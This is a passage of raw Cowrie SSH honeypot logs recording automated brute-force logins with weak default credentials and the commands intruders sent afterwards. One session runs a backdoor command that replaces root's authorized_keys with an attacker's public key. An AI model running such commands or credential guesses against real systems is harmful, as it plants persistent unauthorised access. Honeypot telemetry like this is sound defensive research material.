{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:22.321280Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:22.884765Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:23.195712Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:17:23.196540Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:23.350723Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:23.351852Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40776,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecf423a61e6f","protocol":"ssh","message":"New connection: 212.227.125.160:40776 (1.2.3.4:22) [session: ecf423a61e6f]","sensor":"my-vps","timestamp":"2025-08-28T06:17:23.986190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:23.989721Z","src_ip":"212.227.125.160","session":"ecf423a61e6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:24.217973Z","src_ip":"212.227.125.160","session":"ecf423a61e6f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:25.144878Z","src_ip":"212.227.125.160","session":"ecf423a61e6f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:26.379644Z","src_ip":"212.227.125.160","session":"ecf423a61e6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59098,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6f496b89735","protocol":"ssh","message":"New connection: 212.227.125.160:59098 (1.2.3.4:22) [session: c6f496b89735]","sensor":"my-vps","timestamp":"2025-08-28T06:17:29.773504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:29.774747Z","src_ip":"212.227.125.160","session":"c6f496b89735"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:29.878185Z","src_ip":"212.227.125.160","session":"c6f496b89735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40366,"dst_ip":"1.2.3.4","dst_port":22,"session":"f48d54fc144f","protocol":"ssh","message":"New connection: 212.227.235.229:40366 (1.2.3.4:22) [session: f48d54fc144f]","sensor":"my-vps","timestamp":"2025-08-28T06:17:29.887905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:29.888814Z","src_ip":"212.227.235.229","session":"f48d54fc144f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.031906Z","src_ip":"212.227.235.229","session":"f48d54fc144f"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.190855Z","src_ip":"212.227.125.160","session":"c6f496b89735"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59806,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ac966004c25","protocol":"ssh","message":"New connection: 212.227.235.229:59806 (1.2.3.4:22) [session: 9ac966004c25]","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.468516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.469370Z","src_ip":"212.227.235.229","session":"9ac966004c25"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.489784Z","src_ip":"212.227.235.229","session":"f48d54fc144f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:30.712484Z","src_ip":"212.227.235.229","session":"9ac966004c25"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:31.306649Z","src_ip":"212.227.125.160","session":"c6f496b89735"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:31.444357Z","src_ip":"212.227.235.229","session":"9ac966004c25"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:31.634245Z","src_ip":"212.227.235.229","session":"f48d54fc144f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:32.690174Z","src_ip":"212.227.235.229","session":"9ac966004c25"}
{"eventid":"cowrie.session.connect","src_ip":"106.75.163.72","src_port":41212,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3a0eac7872","protocol":"ssh","message":"New connection: 106.75.163.72:41212 (1.2.3.4:22) [session: ed3a0eac7872]","sensor":"my-vps","timestamp":"2025-08-28T06:17:35.303234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:17:35.304152Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:17:35.514495Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa147258.","message":"login attempt [root/Aa147258.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:36.780140Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:37.811146Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:17:37.811888Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T06:17:37.812750Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:38.514086Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:38.954621Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T06:17:38.955304Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T06:17:39.625092Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:39.625912Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.session.connect","src_ip":"106.75.163.72","src_port":41220,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6a62cbc3df5","protocol":"ssh","message":"New connection: 106.75.163.72:41220 (1.2.3.4:22) [session: c6a62cbc3df5]","sensor":"my-vps","timestamp":"2025-08-28T06:17:39.816843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:17:39.817767Z","src_ip":"106.75.163.72","session":"c6a62cbc3df5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:17:40.021176Z","src_ip":"106.75.163.72","session":"c6a62cbc3df5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33398,"dst_ip":"1.2.3.4","dst_port":22,"session":"1406463bf797","protocol":"ssh","message":"New connection: 212.227.125.160:33398 (1.2.3.4:22) [session: 1406463bf797]","sensor":"my-vps","timestamp":"2025-08-28T06:17:40.189537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:40.290832Z","src_ip":"212.227.125.160","session":"1406463bf797"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:40.413305Z","src_ip":"212.227.125.160","session":"1406463bf797"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:40.865978Z","src_ip":"106.75.163.72","session":"c6a62cbc3df5"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:41.307914Z","src_ip":"212.227.125.160","session":"1406463bf797"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:42.071963Z","src_ip":"106.75.163.72","session":"c6a62cbc3df5"}
{"eventid":"cowrie.session.connect","src_ip":"106.75.163.72","src_port":41224,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7827ae96c37","protocol":"ssh","message":"New connection: 106.75.163.72:41224 (1.2.3.4:22) [session: a7827ae96c37]","sensor":"my-vps","timestamp":"2025-08-28T06:17:42.297590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T06:17:42.299220Z","src_ip":"106.75.163.72","session":"a7827ae96c37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ec